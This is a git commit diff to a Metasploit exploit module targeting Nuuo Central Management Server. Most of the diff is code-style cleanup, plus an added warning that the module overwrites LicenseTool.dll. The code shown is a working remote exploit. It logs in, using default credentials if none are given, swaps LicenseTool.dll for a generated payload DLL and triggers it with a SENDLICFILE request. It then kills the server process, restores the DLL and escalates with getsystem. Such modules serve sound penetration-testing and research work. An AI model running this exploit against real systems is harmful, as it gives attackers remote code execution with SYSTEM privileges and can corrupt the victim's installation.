Jacob Robles
parent
9070435603
commit
2b71410807
|
|
@ -24,6 +24,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
This module will either use a provided session number (which can be guessed with an auxiliary
|
This module will either use a provided session number (which can be guessed with an auxiliary
|
||||||
module) or attempt to login using a provided username and password - it will also try the
|
module) or attempt to login using a provided username and password - it will also try the
|
||||||
default credentials if nothing is provided.
|
default credentials if nothing is provided.
|
||||||
|
|
||||||
|
This module will overwrite the LicenseTool.dll file in the CMS Server installation. If the module
|
||||||
|
fails to restore LicenseTool.dll then the installation will be corrupted and NCS Server will
|
||||||
|
not execute successfully.
|
||||||
},
|
},
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Author' =>
|
'Author' =>
|
||||||
|
|
@ -44,57 +48,57 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
|
[ 'Nuuo Central Management Server <= v2.4.0', {} ],
|
||||||
],
|
],
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'DisclosureDate' => "Oct 11 2018",
|
'DisclosureDate' => 'Oct 11 2018',
|
||||||
'DefaultTarget' => 0))
|
'DefaultTarget' => 0))
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_new_session(client)
|
def on_new_session(client)
|
||||||
if client.type == "meterpreter"
|
if client.type == 'meterpreter'
|
||||||
print_warning("Please wait a bit while we clean up")
|
print_warning('Please wait a bit while we clean up')
|
||||||
client.sys.process.get_processes().each do |proc|
|
client.sys.process.get_processes().each do |proc|
|
||||||
if proc['name'] == "NCS_Server.exe"
|
if proc['name'] == 'NCS_Server.exe'
|
||||||
client.sys.process.kill(proc['pid'])
|
client.sys.process.kill(proc['pid'])
|
||||||
sleep 5
|
Rex.sleep(5)
|
||||||
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
client.shell_command_token("move /y #{@dll} LicenseTool.dll")
|
||||||
client.sys.process.execute("NCS_Server.exe")
|
client.sys.process.execute('NCS_Server.exe')
|
||||||
print_good("Successfully restored LicenseTool.dll!")
|
print_good('Successfully restored LicenseTool.dll!')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
# elevate privs to system (we're already Admin anyway), and we're done!
|
# elevate privs to system (we're already Admin anyway), and we're done!
|
||||||
client.run_cmd("getsystem")
|
client.run_cmd('getsystem')
|
||||||
print_good("We should have SYSTEM now, enjoy your shell!")
|
print_good('We should have SYSTEM now, enjoy your shell!')
|
||||||
else
|
else
|
||||||
print_error("You are not using meterpreter, so we are unable to restore LicenseTool.dll")
|
print_error('You are not using meterpreter, so we are unable to restore LicenseTool.dll')
|
||||||
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
print_error("To restore it, kill the NCS_Server.exe process and copy <CMS_FOLDER>\\#{@dll} to <CMS_FOLDER>\\LicenseTool.dll")
|
||||||
print_error("... otherwise the Nuuo CMS installation will be nuked!")
|
print_error('... otherwise the Nuuo CMS installation will be nuked!')
|
||||||
print_good("Anyway, enjoy your shell!")
|
print_good('Anyway, enjoy your shell!')
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
nucs_login
|
nucs_login
|
||||||
|
|
||||||
if @nucs_session == nil
|
unless @nucs_session
|
||||||
fail_with(Failure::NoAccess, "Failed to login to Nuuo CMS")
|
fail_with(Failure::NoAccess, 'Failed to login to Nuuo CMS')
|
||||||
end
|
end
|
||||||
|
|
||||||
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
# Download and upload a backup of LicenseTool.dll, so that we can restore it at post
|
||||||
# and not nuke the CMS installation.
|
# and not nuke the CMS installation.
|
||||||
@dll = rand_text_alpha(12)
|
@dll = rand_text_alpha(12)
|
||||||
print_status("Backing up LicenseTool.dll to #{@dll}")
|
print_status("Backing up LicenseTool.dll to #{@dll}")
|
||||||
dll_data = nucs_download_file("LicenseTool.dll")
|
dll_data = nucs_download_file('LicenseTool.dll')
|
||||||
nucs_upload_file(@dll, dll_data)
|
nucs_upload_file(@dll, dll_data)
|
||||||
|
|
||||||
print_status("Uploading payload...")
|
print_status('Uploading payload...')
|
||||||
nucs_upload_file("LicenseTool.dll", generate_payload_dll)
|
nucs_upload_file('LicenseTool.dll', generate_payload_dll)
|
||||||
|
|
||||||
print_status("Sleeping 15 seconds...")
|
print_status('Sleeping 15 seconds...')
|
||||||
sleep 15
|
Rex.sleep(15)
|
||||||
|
|
||||||
print_status("Sending SENDLICFILE request, shell incoming!")
|
print_status('Sending SENDLICFILE request, shell incoming!')
|
||||||
license_data = rand_text_alpha(50..350)
|
license_data = rand_text_alpha(50..350)
|
||||||
nucs_send_msg(["SENDLICFILE", "FileName: #{rand_text_alpha(3..11)}.lic",
|
nucs_send_msg(['SENDLICFILE', "FileName: #{rand_text_alpha(3..11)}.lic",
|
||||||
"Content-Length: " + license_data.length.to_s], license_data)
|
'Content-Length: ' + license_data.length.to_s], license_data)
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue